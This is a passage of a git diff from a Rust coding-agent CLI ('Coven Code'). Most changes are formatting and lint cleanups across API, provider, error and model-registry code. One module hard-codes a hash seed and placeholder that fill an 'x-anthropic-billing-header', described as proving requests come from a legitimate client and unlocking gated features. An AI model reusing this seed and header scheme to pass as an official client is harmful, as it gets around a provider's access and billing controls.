0x6E52_736A_C806_831E; -const CCH_MASK: u64 = 0xF_FFFF; // 5 hex digits -const CCH_PLACEHOLDER: &str = "cch=00000"; - -/// Compute the 5-hex-digit CCH hash for `body`. -pub fn compute_cch(body: &[u8]) -> String { - let hash = xxh64(body, CCH_SEED) & CCH_MASK; - format!("cch={hash:05x}") -} - -/// Return true if `header` contains the placeholder that should be replaced. -pub fn has_cch_placeholder(s: &str) -> bool { - s.contains(CCH_PLACEHOLDER) -} - -/// Replace the placeholder in `s` with the computed hash. -pub fn replace_cch_placeholder(s: &str, hash: &str) -> String { - s.replacen(CCH_PLACEHOLDER, hash, 1) -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_compute_cch_format() { - let hash = compute_cch(b"test body"); - assert!(hash.starts_with("cch=")); - assert_eq!(hash.len(), 9); // cch= + 5 hex digits - } - - #[test] - fn test_has_cch_placeholder() { - assert!(has_cch_placeholder("header cch=00000 more")); - assert!(!has_cch_placeholder("header cch=abc12 more")); - assert!(!has_cch_placeholder("header cch= more")); - } - - #[test] - fn test_replace_cch_placeholder() { - let result = replace_cch_placeholder("cch=00000; other", "cch=abcde"); - assert_eq!(result, "cch=abcde; other"); - } - - #[test] - fn test_cch_deterministic() { - let body = b"same body"; - let hash1 = compute_cch(body); - let hash2 = compute_cch(body); - assert_eq!(hash1, hash2); - } -} +//! CCH (Client-Computed Hash) request signing. +//! +//! Computes an xxHash64 fingerprint of the serialised request body and embeds +//! it in the x-anthropic-billing-header. +//! The server uses the hash to verify the request originated from a legitimate +//! Coven Code client and to gate features like fast-mode. + +use xxhash_rust::xxh64::xxh64; + +const CCH_SEED: u64 = 0x6E52_736A_C806_831E; +const CCH_MASK: u64 = 0xF_FFFF; // 5 hex digits +const CCH_PLACEHOLDER: &str = "cch=00000"; + +/// Compute the 5-hex-digit CCH hash for `body`. +pub fn compute_cch(body: &[u8]) -> String { + let hash = xxh64(body, CCH_SEED) & CCH_MASK; + format!("cch={hash:05x}") +} + +/// Return true if `header` contains the placeholder that should be replaced. +pub fn has_cch_placeholder(s: &str) -> bool { + s.contains(CCH_PLACEHOLDER) +} + +/// Replace the placeholder in `s` with the computed hash. +pub fn replace_cch_placeholder(s: &str, hash: &str) -> String { + s.replacen(CCH_PLACEHOLDER, hash, 1) +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_compute_cch_format() { + let hash = compute_cch(b"test body"); + assert!(hash.starts_with("cch=")); + assert_eq!(hash.len(), 9); // cch= + 5 hex digits + } + + #[test] + fn test_has_cch_placeholder() { + assert!(has_cch_placeholder("header cch=00000 more")); + assert!(!has_cch_placeholder("header cch=abc12 more")); + assert!(!has_cch_placeholder("header cch= more")); + } + + #[test] + fn test_replace_cch_placeholder() { + let result = replace_cch_placeholder("cch=00000; other", "cch=abcde"); + assert_eq!(result, "cch=abcde; other"); + } + + #[test] + fn test_cch_deterministic() { + let body = b"same body"; + let hash1 = compute_cch(body); + let hash2 = compute_cch(body); + assert_eq!(hash1, hash2); + } +} diff --git a/src-rust/crates/api/src/codex_adapter.rs b/src-rust/crates/api/src/codex_adapter.rs index b7fc5ba..bd400f5 100644 --- a/src-rust/crates/api/src/codex_adapter.rs +++ b/src-rust/crates/api/src/codex_adapter.rs @@ -1,236 +1,230 @@ -//! Codex schema adapter — translates between Anthropic Messages API and OpenAI API formats. -//! -//! When using OpenAI Codex provider, requests are translated from Anthropic's -//! CreateMessageRequest format to OpenAI's ChatCompletion API format, and responses -//! are translated back to Anthropic's CreateMessageResponse format. - -use serde_json::{json, Value}; -use super::types::{CreateMessageRequest, CreateMessageResponse, SystemPrompt}; -use claurst_core::types::UsageInfo; - -/// OpenAI Codex API endpoint for responses -pub const CODEX_RESPONSES_ENDPOINT: &str = "https://chatgpt.com/backend-api/codex/responses"; - -/// Convert an Anthropic CreateMessageRequest to OpenAI ChatCompletion request format. -pub fn anthropic_to_openai_request(request: &CreateMessageRequest) -> Value { - // Convert Anthropic messages to OpenAI format - let messages: Vec = request - .messages - .iter() - .map(|msg| { - json!({ - "role": msg.role.to_lowercase(), - "content": msg.content, - }) - }) - .collect(); - - // Build system message from prompt if present - let mut openai_messages = vec![]; - - if let Some(system) = &request.system { - let system_text = match system { - SystemPrompt::Text(text) => text.clone(), - SystemPrompt::Blocks(blocks) => { - blocks - .iter() - .map(|b| b.text.clone()) - .collect::>() - .join("\n") - } - }; - - openai_messages.push(json!({ - "role": "system", - "content": system_text, - })); - } - - // Add regular messages - openai_messages.extend(messages); - - // Build OpenAI request - let mut openai_req = json!({ - "model": request.model, - "messages": openai_messages, - "max_tokens": request.max_tokens, - "stream": request.stream, - }); - - // Add optional parameters - if let Some(temperature) = request.temperature { - openai_req["temperature"] = json!(temperature); - } - if let Some(top_p) = request.top_p { - openai_req["top_p"] = json!(top_p); - } - - // Note: OpenAI Codex doesn't support thinking blocks or tools in the same way - // Skip those fields for now — they would need special handling - - openai_req -} - -/// Convert an OpenAI ChatCompletion response to Anthropic format fields. -/// Returns (content_text, finish_reason, input_tokens, output_tokens) -pub fn parse_openai_response(response: &Value) -> (String, String, u64, u64) { - let content = response - .get("choices") - .and_then(|c| c.get(0)) - .and_then(|c| c.get("message")) - .and_then(|m| m.get("content")) - .and_then(|c| c.as_str()) - .unwrap_or("") - .to_string(); - - let finish_reason = response - .get("choices") - .and_then(|c| c.get(0)) - .and_then(|c| c.get("finish_reason")) - .and_then(|f| f.as_str()) - .unwrap_or("stop"); - - // Map OpenAI finish_reason to Anthropic stop_reason - let stop_reason = match finish_reason { - "stop" => "end_turn", - "length" => "max_tokens", - "content_filter" => "end_turn", - "function_call" => "tool_use", - _ => "end_turn", - } - .to_string(); - - // Extract usage info - let input_tokens = response - .get("usage") - .and_then(|u| u.get("prompt_tokens")) - .and_then(|t| t.as_u64()) - .unwrap_or(0); - - let output_tokens = response - .get("usage") - .and_then(|u| u.get("completion_tokens")) - .and_then(|t| t.as_u64()) - .unwrap_or(0); - - (content, stop_reason, input_tokens, output_tokens) -} - -/// Build an Anthropic CreateMessageResponse from parsed OpenAI data. -pub fn build_anthropic_response( - content: &str, - stop_reason: &str, - input_tokens: u64, - output_tokens: u64, - model: &str, -) -> CreateMessageResponse { - // Generate a simple message ID - let id = format!( - "msg_{}", - std::time::SystemTime::now() - .duration_since(std::time::UNIX_EPOCH) - .map(|d| format!("{:x}", d.as_nanos())) - .unwrap_or_else(|_| "unknown".to_string()) - ); - - CreateMessageResponse { - id, - response_type: "message".to_string(), - role: "assistant".to_string(), - content: vec![json!({ - "type": "text", - "text": content, - })], - model: model.to_string(), - stop_reason: Some(stop_reason.to_string()), - stop_sequence: None, - usage: UsageInfo { - input_tokens, - output_tokens, - cache_creation_input_tokens: 0, - cache_read_input_tokens: 0, - }, - } -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::types::{ApiMessage, SystemPrompt}; - - #[test] - fn test_anthropic_to_openai_request_basic() { - let request = CreateMessageRequest { - model: "gpt-5.2-codex".to_string(), - max_tokens: 1024, - messages: vec![ApiMessage { - role: "user".to_string(), - content: json!("Hello"), - }], - system: Some(SystemPrompt::Text("You are helpful".to_string())), - tools: None, - temperature: Some(0.7), - top_p: None, - top_k: None, - stop_sequences: None, - stream: false, - thinking: None, - }; - - let openai_req = anthropic_to_openai_request(&request); - - // Verify structure - assert_eq!(openai_req["model"], "gpt-5.2-codex"); - assert_eq!(openai_req["max_tokens"], 1024); - assert_eq!(openai_req["temperature"], 0.7); - assert!(openai_req["messages"].is_array()); - - let messages = openai_req["messages"].as_array().unwrap(); - assert_eq!(messages.len(), 2); // system + user - assert_eq!(messages[0]["role"], "system"); - assert_eq!(messages[1]["role"], "user"); - } - - #[test] - fn test_parse_openai_response_basic() { - let openai_resp = json!({ - "choices": [{ - "message": { - "content": "Hello, world!" - }, - "finish_reason": "stop" - }], - "usage": { - "prompt_tokens": 10, - "completion_tokens": 5, - "total_tokens": 15 - } - }); - - let (content, stop_reason, input_tokens, output_tokens) = - parse_openai_response(&openai_resp); - - assert_eq!(content, "Hello, world!"); - assert_eq!(stop_reason, "end_turn"); - assert_eq!(input_tokens, 10); - assert_eq!(output_tokens, 5); - } - - #[test] - fn test_build_anthropic_response() { - let response = build_anthropic_response( - "Test response", - "end_turn", - 100, - 50, - "gpt-5.2-codex", - ); - - assert_eq!(response.response_type, "message"); - assert_eq!(response.role, "assistant"); - assert_eq!(response.model, "gpt-5.2-codex"); - assert_eq!(response.stop_reason, Some("end_turn".to_string())); - assert_eq!(response.usage.input_tokens, 100); - assert_eq!(response.usage.output_tokens, 50); - } -} +//! Codex schema adapter — translates between Anthropic Messages API and OpenAI API formats. +//! +//! When using OpenAI Codex provider, requests are translated from Anthropic's +//! CreateMessageRequest format to OpenAI's ChatCompletion API format, and responses +//! are translated back to Anthropic's CreateMessageResponse format. + +use super::types::{CreateMessageRequest, CreateMessageResponse, SystemPrompt}; +use claurst_core::types::UsageInfo; +use serde_json::{json, Value}; + +/// OpenAI Codex API endpoint for responses +pub const CODEX_RESPONSES_ENDPOINT: &str = "https://chatgpt.com/backend-api/codex/responses"; + +/// Convert an Anthropic CreateMessageRequest to OpenAI ChatCompletion request format. +pub fn anthropic_to_openai_request(request: &CreateMessageRequest) -> Value { + // Convert Anthropic messages to OpenAI format + let messages: Vec = request + .messages + .iter() + .map(|msg| { + json!({ + "role": msg.role.to_lowercase(), + "content": msg.content, + }) + }) + .collect(); + + // Build system message from prompt if present + let mut openai_messages = vec![]; + + if let Some(system) = &request.system { + let system_text = match system { + SystemPrompt::Text(text) => text.clone(), + SystemPrompt::Blocks(blocks) => blocks + .iter() + .map(|b| b.text.clone()) + .collect::>() + .join("\n"), + }; + + openai_messages.push(json!({ + "role": "system", + "content": system_text, + })); + } + + // Add regular messages + openai_messages.extend(messages); + + // Build OpenAI request + let mut openai_req = json!({ + "model": request.model, + "messages": openai_messages, + "max_tokens": request.max_tokens, + "stream": request.stream, + }); + + // Add optional parameters + if let Some(temperature) = request.temperature { + openai_req["temperature"] = json!(temperature); + } + if let Some(top_p) = request.top_p { + openai_req["top_p"] = json!(top_p); + } + + // Note: OpenAI Codex doesn't support thinking blocks or tools in the same way + // Skip those fields for now — they would need special handling + + openai_req +} + +/// Convert an OpenAI ChatCompletion response to Anthropic format fields. +/// Returns (content_text, finish_reason, input_tokens, output_tokens) +pub fn parse_openai_response(response: &Value) -> (String, String, u64, u64) { + let content = response + .get("choices") + .and_then(|c| c.get(0)) + .and_then(|c| c.get("message")) + .and_then(|m| m.get("content")) + .and_then(|c| c.as_str()) + .unwrap_or("") + .to_string(); + + let finish_reason = response + .get("choices") + .and_then(|c| c.get(0)) + .and_then(|c| c.get("finish_reason")) + .and_then(|f| f.as_str()) + .unwrap_or("stop"); + + // Map OpenAI finish_reason to Anthropic stop_reason + let stop_reason = match finish_reason { + "stop" => "end_turn", + "length" => "max_tokens", + "content_filter" => "end_turn", + "function_call" => "tool_use", + _ => "end_turn", + } + .to_string(); + + // Extract usage info + let input_tokens = response + .get("usage") + .and_then(|u| u.get("prompt_tokens")) + .and_then(|t| t.as_u64()) + .unwrap_or(0); + + let output_tokens = response + .get("usage") + .and_then(|u| u.get("completion_tokens")) + .and_then(|t| t.as_u64()) + .unwrap_or(0); + + (content, stop_reason, input_tokens, output_tokens) +} + +/// Build an Anthropic CreateMessageResponse from parsed OpenAI data. +pub fn build_anthropic_response( + content: &str, + stop_reason: &str, + input_tokens: u64, + output_tokens: u64, + model: &str, +) -> CreateMessageResponse { + // Generate a simple message ID + let id = format!( + "msg_{}", + std::time::SystemTime::now() + .duration_since(std::time::UNIX_EPOCH) + .map(|d| format!("{:x}", d.as_nanos())) + .unwrap_or_else(|_| "unknown".to_string()) + ); + + CreateMessageResponse { + id, + response_type: "message".to_string(), + role: "assistant".to_string(), + content: vec![json!({ + "type": "text", + "text": content, + })], + model: model.to_string(), + stop_reason: Some(stop_reason.to_string()), + stop_sequence: None, + usage: UsageInfo { + input_tokens, + output_tokens, + cache_creation_input_tokens: 0, + cache_read_input_tokens: 0, + }, + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::types::{ApiMessage, SystemPrompt}; + + #[test] + fn test_anthropic_to_openai_request_basic() { + let request = CreateMessageRequest { + model: "gpt-5.2-codex".to_string(), + max_tokens: 1024, + messages: vec![ApiMessage { + role: "user".to_string(), + content: json!("Hello"), + }], + system: Some(SystemPrompt::Text("You are helpful".to_string())), + tools: None, + temperature: Some(0.7), + top_p: None, + top_k: None, + stop_sequences: None, + stream: false, + thinking: None, + }; + + let openai_req = anthropic_to_openai_request(&request); + + // Verify structure + assert_eq!(openai_req["model"], "gpt-5.2-codex"); + assert_eq!(openai_req["max_tokens"], 1024); + let temperature = openai_req["temperature"].as_f64().unwrap(); + assert!((temperature - 0.7).abs() < 1e-6); + assert!(openai_req["messages"].is_array()); + + let messages = openai_req["messages"].as_array().unwrap(); + assert_eq!(messages.len(), 2); // system + user + assert_eq!(messages[0]["role"], "system"); + assert_eq!(messages[1]["role"], "user"); + } + + #[test] + fn test_parse_openai_response_basic() { + let openai_resp = json!({ + "choices": [{ + "message": { + "content": "Hello, world!" + }, + "finish_reason": "stop" + }], + "usage": { + "prompt_tokens": 10, + "completion_tokens": 5, + "total_tokens": 15 + } + }); + + let (content, stop_reason, input_tokens, output_tokens) = + parse_openai_response(&openai_resp); + + assert_eq!(content, "Hello, world!"); + assert_eq!(stop_reason, "end_turn"); + assert_eq!(input_tokens, 10); + assert_eq!(output_tokens, 5); + } + + #[test] + fn test_build_anthropic_response() { + let response = + build_anthropic_response("Test response", "end_turn", 100, 50, "gpt-5.2-codex"); + + assert_eq!(response.response_type, "message"); + assert_eq!(response.role, "assistant"); + assert_eq!(response.model, "gpt-5.2-codex"); + assert_eq!(response.stop_reason, Some("end_turn".to_string())); + assert_eq!(response.usage.input_tokens, 100); + assert_eq!(response.usage.output_tokens, 50); + } +} diff --git a/src-rust/crates/api/src/error_handling.rs b/src-rust/crates/api/src/error_handling.rs index ad2ad49..2bd2643 100644 --- a/src-rust/crates/api/src/error_handling.rs +++ b/src-rust/crates/api/src/error_handling.rs @@ -262,8 +262,7 @@ impl RetryConfig { /// Applies exponential back-off with ±10 % jitter derived from the /// current system time (no external `rand` dependency required). pub fn delay_for_attempt(&self, attempt: u32) -> Duration { - let base = self.initial_delay.as_secs_f64() - * self.backoff_multiplier.powi(attempt as i32); + let base = self.initial_delay.as_secs_f64() * self.backoff_multiplier.powi(attempt as i32); let jitter = base * 0.1 * time_jitter_f64(); Duration::from_secs_f64((base + jitter).min(self.max_delay.as_secs_f64())) } diff --git a/src-rust/crates/api/src/lib.rs b/src-rust/crates/api/src/lib.rs index e6d0680..8e97f3b 100644 --- a/src-rust/crates/api/src/lib.rs +++ b/src-rust/crates/api/src/lib.rs @@ -27,12 +27,12 @@ pub mod cch; pub mod codex_adapter; // Provider-agnostic unified types (Phase 1A). -pub mod provider_types; pub mod provider_error; +pub mod provider_types; // Provider abstraction traits (Phase 1B). -pub mod provider; pub mod auth; +pub mod provider; pub mod stream_parser; pub mod transform; @@ -59,13 +59,13 @@ pub use streaming::{AnthropicStreamEvent, StreamHandler}; pub use types::*; // Phase 1A re-exports — provider-agnostic layer. -pub use provider_types::*; pub use provider_error::ProviderError; +pub use provider_types::*; // Phase 1B re-exports — provider abstraction traits. -pub use provider::{LlmProvider, ModelInfo}; pub use auth::{AuthProvider, LoginFlow}; -pub use stream_parser::{StreamParser, SseStreamParser, JsonLinesStreamParser}; +pub use provider::{LlmProvider, ModelInfo}; +pub use stream_parser::{JsonLinesStreamParser, SseStreamParser, StreamParser}; pub use transform::MessageTransformer; // Phase 1C re-exports — provider registry. @@ -79,8 +79,8 @@ pub use providers::OpenAiProvider; // Phase 3 re-exports — model registry. pub use model_registry::{ - CostBreakdown, ExperimentalMode, InterleavedReasoning, Modality, ModelEntry, ModelRegistry, - ModelStatus, ProviderEntry, ProviderOverride, effective_model_for_config, + effective_model_for_config, CostBreakdown, ExperimentalMode, InterleavedReasoning, Modality, + ModelEntry, ModelRegistry, ModelStatus, ProviderEntry, ProviderOverride, }; // Phase 6 re-exports — provider-aware error handling. @@ -93,8 +93,7 @@ pub use providers::CopilotProvider; // Phase 2B re-exports — OpenAI-compatible generic adapter + common factories. pub use providers::{ - OpenAiCompatProvider, - ollama, lm_studio, deepseek, groq, xai, openrouter, mistral, opencode_zen, + deepseek, groq, lm_studio, mistral, ollama, opencode_zen, openrouter, xai, OpenAiCompatProvider, }; // Composite "Free" provider — stacks many free-tier upstreams behind one @@ -281,14 +280,9 @@ pub mod streaming { content_block: ContentBlock, }, /// Incremental delta for an existing content block. - ContentBlockDelta { - index: usize, - delta: ContentDelta, - }, + ContentBlockDelta { index: usize, delta: ContentDelta }, /// A content block is finished. - ContentBlockStop { - index: usize, - }, + ContentBlockStop { index: usize }, /// Final message-level delta (stop_reason, usage). MessageDelta { stop_reason: Option, @@ -297,15 +291,11 @@ pub mod streaming { /// The message is complete. MessageStop, /// An error occurred during streaming. - Error { - error_type: String, - message: String, - }, + Error { error_type: String, message: String }, /// A ping/keep-alive event. Ping, } - /// The delta payload inside a `content_block_delta` event. #[derive(Debug, Clone, Serialize, Deserialize)] #[serde(tag = "type", rename_all = "snake_case")] @@ -404,20 +394,15 @@ pub mod client { use super::*; /// Provider selection for API calls. - #[derive(Debug, Clone, Copy, PartialEq, Eq)] + #[derive(Debug, Clone, Copy, Default, PartialEq, Eq)] pub enum Provider { /// Use Anthropic's API + #[default] Anthropic, /// Use OpenAI Codex via OAuth Codex, } - impl Default for Provider { - fn default() -> Self { - Provider::Anthropic - } - } - /// Configuration for the HTTP client. #[derive(Debug, Clone)] pub struct ClientConfig { @@ -561,7 +546,11 @@ pub mod client { "Model '{}' is a Google model. Use `--provider google` or set GOOGLE_API_KEY.", model ) - } else if model.starts_with("gpt-") || model.starts_with("o1") || model.starts_with("o3") || model.starts_with("o4") { + } else if model.starts_with("gpt-") + || model.starts_with("o1") + || model.starts_with("o3") + || model.starts_with("o4") + { format!( "Model '{}' is an OpenAI model. Use `--provider openai` or set OPENAI_API_KEY.", model @@ -593,11 +582,13 @@ pub mod client { ) } else { "Set ANTHROPIC_API_KEY, run `coven-code auth login`, \ - or use --provider to select a different provider (e.g. --provider openai).".to_string() + or use --provider to select a different provider (e.g. --provider openai)." + .to_string() }; - return Err(ClaudeError::Auth( - format!("No API key for the selected model. {}", hint) - )); + return Err(ClaudeError::Auth(format!( + "No API key for the selected model. {}", + hint + ))); } // Route to Codex if configured if self.config.provider == Provider::Codex { @@ -680,7 +671,11 @@ pub mod client { "Model '{}' is a Google model. Use `--provider google` or set GOOGLE_API_KEY.", model ) - } else if model.starts_with("gpt-") || model.starts_with("o1") || model.starts_with("o3") || model.starts_with("o4") { + } else if model.starts_with("gpt-") + || model.starts_with("o1") + || model.starts_with("o3") + || model.starts_with("o4") + { format!( "Model '{}' is an OpenAI model. Use `--provider openai` or set OPENAI_API_KEY.", model @@ -688,7 +683,10 @@ pub mod client { } else if model.starts_with("deepseek") { format!("Model '{}' is a DeepSeek model. Use `--provider deepseek` or set DEEPSEEK_API_KEY.", model) } else if model.starts_with("grok") { - format!("Model '{}' is an xAI model. Use `--provider xai` or set XAI_API_KEY.", model) + format!( + "Model '{}' is an xAI model. Use `--provider xai` or set XAI_API_KEY.", + model + ) } else if model.starts_with("mistral") || model.starts_with("codestral") { format!("Model '{}' is a Mistral model. Use `--provider mistral` or set MISTRAL_API_KEY.", model) } else if model.starts_with("command-") { @@ -697,11 +695,13 @@ pub mod client { format!("Model '{}' looks like a Llama model. Use `--provider groq` or `--provider ollama` for local.", model) } else { "Set ANTHROPIC_API_KEY, run `coven-code auth login`, \ - or use --provider to select a different provider (e.g. --provider openai).".to_string() + or use --provider to select a different provider (e.g. --provider openai)." + .to_string() }; - return Err(ClaudeError::Auth( - format!("No API key for the selected model. {}", hint) - )); + return Err(ClaudeError::Auth(format!( + "No API key for the selected model. {}", + hint + ))); } // Codex provider doesn't support streaming yet if self.config.provider == Provider::Codex { @@ -761,7 +761,10 @@ pub mod client { claurst_core::oauth_config::CLAUDE_CODE_VERSION_FOR_OAUTH ); req = req - .header("anthropic-beta", claurst_core::oauth_config::OAUTH_BETA_FLAGS.join(",")) + .header( + "anthropic-beta", + claurst_core::oauth_config::OAUTH_BETA_FLAGS.join(","), + ) .header("user-agent", ua) .header("x-app", "cli") .header("Authorization", format!("Bearer {}", &self.config.api_key)); @@ -787,10 +790,7 @@ pub mod client { // ---- Internal helpers -------------------------------------------- /// Build the common request and execute with retry logic. - async fn send_with_retry( - &self, - body: &Value, - ) -> Result { + async fn send_with_retry(&self, body: &Value) -> Result { let url = format!("{}/v1/messages", self.config.api_base); let mut attempts = 0u32; let mut delay = self.config.initial_retry_delay; @@ -950,9 +950,7 @@ pub mod client { for line in lines { let line = line.trim_end_matches('\r'); if let Some(frame) = parser.feed_line(line) { - if let Some(event) = - Self::frame_to_event(&frame.event, &frame.data) - { + if let Some(event) = Self::frame_to_event(&frame.event, &frame.data) { handler.on_event(&event); if tx.send(event).await.is_err() { // Receiver dropped – stop reading. @@ -1224,7 +1222,10 @@ impl StreamAccumulator { name: name.clone(), json_buf: String::new(), }, - ContentBlock::Thinking { thinking, signature } => PartialBlock::Thinking { + ContentBlock::Thinking { + thinking, + signature, + } => PartialBlock::Thinking { thinking_buf: thinking.clone(), signature_buf: signature.clone(), }, @@ -1319,6 +1320,12 @@ impl StreamAccumulator { } } +impl Default for StreamAccumulator { + fn default() -> Self { + Self::new() + } +} + #[cfg(test)] mod tests { use super::*; diff --git a/src-rust/crates/api/src/model_registry.rs b/src-rust/crates/api/src/model_registry.rs index 8595503..1722317 100644 --- a/src-rust/crates/api/src/model_registry.rs +++ b/src-rust/crates/api/src/model_registry.rs @@ -55,19 +55,16 @@ pub enum Modality { } /// Model lifecycle status as reported by models.dev. -#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)] +#[derive(Debug, Clone, Copy, Default, PartialEq, Eq, Serialize, Deserialize)] #[serde(rename_all = "lowercase")] pub enum ModelStatus { + #[default] Active, Beta, Alpha, Deprecated, } -impl Default for ModelStatus { - fn default() -> Self { ModelStatus::Active } -} - impl ModelStatus { /// Whether to surface this model in default UI listings. /// @@ -250,7 +247,9 @@ pub struct ModelEntry { pub experimental_modes: HashMap, } -fn default_true() -> bool { true } +fn default_true() -> bool { + true +} impl ModelEntry { /// Whether this model accepts image input. Derived from `modalities_input`. @@ -420,7 +419,9 @@ mod md { pub headers: HashMap, } - fn default_true() -> bool { true } + fn default_true() -> bool { + true + } } // --------------------------------------------------------------------------- @@ -466,14 +467,17 @@ fn transform_api(api: md::ApiJson) -> ParsedSnapshot { let provider_id = remap_provider_id(&raw_provider_id).to_string(); let pid = ProviderId::new(provider_id.clone()); - out.providers.insert(provider_id.clone(), ProviderEntry { - id: pid.clone(), - name: p.name, - env: p.env, - api: p.api, - npm: p.npm, - doc: p.doc, - }); + out.providers.insert( + provider_id.clone(), + ProviderEntry { + id: pid.clone(), + name: p.name, + env: p.env, + api: p.api, + npm: p.npm, + doc: p.doc, + }, + ); for (model_id, m) in p.models.into_iter() { let mid = ModelId::new(model_id.clone()); @@ -689,9 +693,7 @@ impl ModelRegistry { // Prefix match (handles version suffixes) for entry in self.entries.values() { - if (*entry.info.id).starts_with(model_name) - || model_name.starts_with(&*entry.info.id) - { + if (*entry.info.id).starts_with(model_name) || model_name.starts_with(&*entry.info.id) { return Some(entry.info.provider_id.clone()); } } @@ -841,7 +843,7 @@ impl ModelRegistry { /// List all known providers (sorted by id for stable output). pub fn list_providers(&self) -> Vec<&ProviderEntry> { let mut v: Vec<&ProviderEntry> = self.providers.values().collect(); - v.sort_by(|a, b| (&*a.id).cmp(&*b.id)); + v.sort_by_key(|entry| entry.id.to_string()); v } @@ -1002,12 +1004,7 @@ fn flagship_patterns_for(provider_id: &str) -> &'static [&'static str] { "mistral" => &["mistral-large", "codestral", "mistral-medium", "devstral"], "xai" => &["grok-4", "grok-3", "grok-2"], "cohere" => &["command-a", "command-r-plus", "command-r"], - "groq" => &[ - "llama-3.3-70b", - "llama-3.1-70b", - "qwen", - "deepseek-r1", - ], + "groq" => &["llama-3.3-70b", "llama-3.1-70b", "qwen", "deepseek-r1"], "cerebras" => &["llama-3.3-70b", "qwen-3-235b", "zai-glm"], "perplexity" => &["sonar-pro", "sonar-reasoning", "sonar"], "openrouter" => &[ @@ -1044,13 +1041,15 @@ fn flagship_patterns_for(provider_id: &str) -> &'static [&'static str] { /// Substring patterns marking a model as the lightweight/cheap default. fn small_patterns_for(provider_id: &str) -> &'static [&'static str] { match provider_id { - "anthropic" | "amazon-bedrock" | "github-copilot" | "azure" => &[ - "claude-haiku-4", - "claude-haiku-3-5", - "claude-haiku", - ], + "anthropic" | "amazon-bedrock" | "github-copilot" | "azure" => { + &["claude-haiku-4", "claude-haiku-3-5", "claude-haiku"] + } "openai" => &["gpt-5-mini", "gpt-4o-mini", "o4-mini", "o3-mini"], - "google" => &["gemini-2.5-flash-lite", "gemini-2.5-flash", "gemini-2.0-flash"], + "google" => &[ + "gemini-2.5-flash-lite", + "gemini-2.5-flash", + "gemini-2.0-flash", + ], "deepseek" => &["deepseek-v4-flash", "deepseek-chat"], "mistral" => &["mistral-small", "mistral-nemo"], "xai" => &["grok-3-mini", "grok-2-mini"], @@ -1130,7 +1129,10 @@ mod tests { let reg = ModelRegistry::new(); let models = reg.list_by_provider("anthropic"); let has_claude = models.iter().any(|m| (*m.info.id).starts_with("claude")); - assert!(has_claude, "anthropic should have at least one claude model"); + assert!( + has_claude, + "anthropic should have at least one claude model" + ); } #[test] @@ -1147,7 +1149,8 @@ mod tests { #[test] fn modalities_drive_vision() { let reg = ModelRegistry::new(); - if let Some(opus) = reg.list_by_provider("anthropic") + if let Some(opus) = reg + .list_by_provider("anthropic") .iter() .find(|m| (*m.info.id).contains("opus")) { diff --git a/src-rust/crates/api/src/provider.rs b/src-rust/crates/api/src/provider.rs index ac2c32e..da1d673 100644 --- a/src-rust/crates/api/src/provider.rs +++ b/src-rust/crates/api/src/provider.rs @@ -11,7 +11,9 @@ use serde::{Deserialize, Serialize}; use std::pin::Pin; use crate::provider_error::ProviderError; -use crate::provider_types::{ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StreamEvent}; +use crate::provider_types::{ + ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StreamEvent, +}; // --------------------------------------------------------------------------- // ModelInfo @@ -63,10 +65,7 @@ pub trait LlmProvider: Send + Sync { async fn create_message_stream( &self, request: ProviderRequest, - ) -> Result< - Pin> + Send>>, - ProviderError, - >; + ) -> Result> + Send>>, ProviderError>; /// Return the list of models available through this provider. /// diff --git a/src-rust/crates/api/src/provider_error.rs b/src-rust/crates/api/src/provider_error.rs index d3dd453..8d476cd 100644 --- a/src-rust/crates/api/src/provider_error.rs +++ b/src-rust/crates/api/src/provider_error.rs @@ -130,14 +130,21 @@ impl ProviderError { impl fmt::Display for ProviderError { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { match self { - ProviderError::ContextOverflow { provider, message, max_tokens } => { + ProviderError::ContextOverflow { + provider, + message, + max_tokens, + } => { write!(f, "[{}] Context overflow: {}", provider, message)?; if let Some(max) = max_tokens { write!(f, " (max {} tokens)", max)?; } Ok(()) } - ProviderError::RateLimited { provider, retry_after } => { + ProviderError::RateLimited { + provider, + retry_after, + } => { write!(f, "[{}] Rate limited", provider)?; if let Some(secs) = retry_after { write!(f, "; retry after {}s", secs)?; @@ -150,34 +157,46 @@ impl fmt::Display for ProviderError { ProviderError::QuotaExceeded { provider, message } => { write!(f, "[{}] Quota exceeded: {}", provider, message) } - ProviderError::ModelNotFound { provider, model, suggestions } => { + ProviderError::ModelNotFound { + provider, + model, + suggestions, + } => { write!(f, "[{}] Model not found: {}", provider, model)?; if !suggestions.is_empty() { write!(f, " (suggestions: {})", suggestions.join(", "))?; } Ok(()) } - ProviderError::ServerError { provider, status, message, .. } => { - match status { - Some(s) => write!(f, "[{}] Server error {}: {}", provider, s, message), - None => write!(f, "[{}] Server error: {}", provider, message), - } - } + ProviderError::ServerError { + provider, + status, + message, + .. + } => match status { + Some(s) => write!(f, "[{}] Server error {}: {}", provider, s, message), + None => write!(f, "[{}] Server error: {}", provider, message), + }, ProviderError::InvalidRequest { provider, message } => { write!(f, "[{}] Invalid request: {}", provider, message) } ProviderError::ContentFiltered { provider, message } => { write!(f, "[{}] Content filtered: {}", provider, message) } - ProviderError::StreamError { provider, message, .. } => { + ProviderError::StreamError { + provider, message, .. + } => { write!(f, "[{}] Stream error: {}", provider, message) } - ProviderError::Other { provider, message, status, .. } => { - match status { - Some(s) => write!(f, "[{}] Error {}: {}", provider, s, message), - None => write!(f, "[{}] Error: {}", provider, message), - } - } + ProviderError::Other { + provider, + message, + status, + .. + } => match status { + Some(s) => write!(f, "[{}] Error {}: {}", provider, s, message), + None => write!(f, "[{}] Error: {}", provider, message), + }, } } } @@ -198,12 +217,14 @@ impl From for ClaudeError { ProviderError::ContextOverflow { .. } => ClaudeError::ContextWindowExceeded, ProviderError::RateLimited { .. } => ClaudeError::RateLimit, ProviderError::AuthFailed { message, .. } => ClaudeError::Auth(message.clone()), - ProviderError::ServerError { status: Some(s), message, .. } => { - ClaudeError::ApiStatus { - status: *s, - message: message.clone(), - } - } + ProviderError::ServerError { + status: Some(s), + message, + .. + } => ClaudeError::ApiStatus { + status: *s, + message: message.clone(), + }, _ => ClaudeError::Api(err.to_string()), } } diff --git a/src-rust/crates/api/src/provider_types.rs 